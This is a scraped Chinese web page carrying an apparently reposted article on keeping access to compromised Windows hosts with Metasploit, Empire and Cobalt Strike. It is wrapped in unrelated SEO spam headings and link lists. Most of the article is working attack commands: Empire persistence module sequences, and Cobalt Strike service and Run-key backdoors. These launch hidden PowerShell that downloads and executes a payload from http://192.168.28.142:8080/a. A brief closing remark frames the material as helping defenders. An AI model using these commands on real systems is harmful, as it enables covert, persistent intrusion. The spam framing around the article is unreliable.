当前位置: 首页 > news >正文

做cp和网站运营一个公司完整的组织架构

做cp和网站运营,一个公司完整的组织架构,西安网站建设iseeyu,邯郸城融网络技术有限公司0x00 前言 在渗透测试中#xff0c;有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。 那么#xff0c;通过漏洞获取到目标主机权限后#xff0c;如何利用框架获得持久性权限呢#xff1f; 0x01 MSF权限维持 使用MSF维持权限的前提是先获得一个met…0x00 前言 在渗透测试中有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。 那么通过漏洞获取到目标主机权限后如何利用框架获得持久性权限呢 0x01 MSF权限维持 使用MSF维持权限的前提是先获得一个meterpreter shell通过meterpreter shell获取持久性shell的方法有两种 Persistence模块 通过启动项启动(persistence)的方式在目标机器上以反弹回连。 -U设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数 -X设置后门在系统启动后自启动。该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限问题会导致添加失败后门将无法启动。 -S作为服务自动启动代理程序具有SYSTEM权限生成的相关文件位置 # 后门文件位置 C:\Windows\Temp C:\Users\Administrator\AppData\Local\Temp # 注册表位置 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Metsvc 模块 通过服务(metsvc)启动的方式在目标机器启动后自启动一个服务等待连接。 后门排查目标主机上开启了一个Meterpreter服务。 0x02 Empire 权限维持 Empire的persistence模块提供了18种权限维持的方法大致可以分为四类即 elevated管理权限misc杂项powerbreachuserland用户权限registry*add_netuserdeaduserbackdoor_lnkschtasks*add_sid_history*eventlog*registrywmi*debugger*resolverschtaskswmi_updater*disable_machine_acct_change*get_sspsinstall_ssp*memssp*skeleton_key* 注册表 (Empire: agents) agents (Empire: agents) interact URL3FZBV (Empire: URL3FZBV) usemodule persistence/elevated/registry* (Empire: powershell/persistence/elevated/registry) set Listener test (Empire: powershell/persistence/elevated/registry) execute因为是开机启动所以会弹个黑框之后还会弹出注册表添加的powershell启动项的框在注册表位置如下 计划任务 (Empire: agents) interact 9NZ2RWBC (Empire: 9NZ2RWBC) usemodule persistence/elevated/schtasks* (Empire: powershell/persistence/elevated/schtasks) set Listener test (Empire: powershell/persistence/elevated/schtasks) set DailyTime 22:50 (Empire: powershell/persistence/elevated/schtasks) execute在任务计划程序库可以看到-任务为Updater-启动程序如下可以到为powershell wmi (Empire: agents) interact 9NZ2RWBC (Empire: 9NZ2RWBC) usemodule persistence/elevated/wmi (Empire: powershell/persistence/elevated/wmi) set Listener test (Empire: powershell/persistence/elevated/wmi) run如何清除后门最简单的方法就是使用Autoruns选择WMI选项卡右键就可以删除恶意后门。 0x03 Cobalt Strike权限维持 通过Cobalt Strike拿到一个shell留后门的方法有很多下面介绍两种比较常见的无文件、自启动后门。 从Cobalt Strike菜单栏Attacks--Web Drive-by--Scaripted Web Delivery生成powershell后门。 根据需要可以自己选择填写所需参数默认端口是80需要注意的就是不要使用重复端口Type选择powershell。 点击Launch后返回powershell远程下载执行命令。 服务自启动后门 sc create Name binpath cmd /c start powershell.exe -nop -w hidden -c \IEX ((new-object net.webclient).downloadstring(http://192.168.28.142:8080/a))\ sc description Name Just For Test //设置服务的描述字符串 sc config Name start auto //设置这个服务为自动启动 net start Name //启动服务重启服务器后成功返回一个shell。 注册表自启动 在windows启动项注册表里面添加一个木马程序路径如 beacongetsystem beaconshell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Keyname /t REG_SZ /d C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \IEX ((new-object net.webclient).downloadstring(http://192.168.28.142:8080/a))\ /f 账号注销后重新登录界面上会出现powershell快速闪过消失成功返回shell。 注册表还有哪些键值可以设置为自启动 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon0x04 结束语 本文简单介绍了通过三大渗透框架进行权限维持的几种方法了解攻击者常用的渗透框架及后门技术有助于更好地去发现并解决服务器安全问题。
http://www.pierceye.com/news/569200/

相关文章:

  • 网站后台上传不了图片请人做网站需要注意什么条件
  • 建网站哪家好案例网页设计感悟与体会
  • 做网站要实名吗深圳货拉拉
  • 综合门户网站是什么意思建设机械网站
  • 主题资源网站建设作业高级网站开发工程师考试题
  • 含山建设局网站免费的个人简历模板文档
  • 门户网站建设推荐高校英文网站建设 文献综述
  • 织梦网站备案免费咨询网站
  • wordpress站内搜索插件网站管理程序
  • 网站建设友链交换自己电脑做网站iis
  • 全球优秀企业网站做原型的素材网站
  • 单页面营销网站怎么用polylang做网站
  • 网站开发入那个科目中国网站建设哪家公司好
  • 网站流量提升方案软件公司名称大全查询
  • 怎么做淘客专属网站济南公司网站推广优化最大的
  • 苏州网站建设极简幕枫织梦模板网站源码
  • 青岛网站设计定制2023传奇手游排行榜
  • 商务酒店网站建设淮南网备案查询
  • 菏泽炫佑网站建设中国城乡建设部网站
  • 网站开发与移动互联自助建站的优点与缺点
  • 公司做网站的好处上海网站设计找哪家
  • 个人如果做网站赚钱吗WordPress 聊天小工具
  • 商城网站建设哪家便宜网络架构师和网络工程师区别
  • p2p网站建设 深圳广东手机网站建设品牌
  • 亚马逊网上商城是正品吗长沙seo计费管理
  • 东莞品牌网站建设多少钱网站设计有限公司怎么样
  • dedecms新网站 上传到万网的空间浦口区网站建站公司
  • 龙岗在线网站建设西安房产信息网
  • 如何建立公司企业网站大朗做网站的
  • 怎么做整蛊网站wordpress系统的特点